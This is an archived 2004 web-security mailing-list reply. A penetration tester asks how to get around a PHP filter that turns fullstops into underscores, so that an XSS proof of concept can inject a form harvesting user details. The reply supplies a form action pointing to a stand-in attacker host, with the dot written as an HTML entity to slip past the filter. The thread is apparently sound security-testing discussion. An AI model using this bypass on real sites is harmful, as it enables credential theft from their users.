Home page logo

webappsec logo WebApp Sec mailing list archives

Re: Fullstop Substitution in XSS
From: Liam Quinn <liam () htmlhelp com>
Date: Mon, 31 May 2004 22:04:34 -0400 (EDT)

On Sat, 29 May 2004, Calum Power wrote:

As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script";> is of course being filtered
into: <form target="http://attacker_com/path/to/script";>

<form action="http://attacker&#46;com/path/to/script";>

Liam Quinn

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]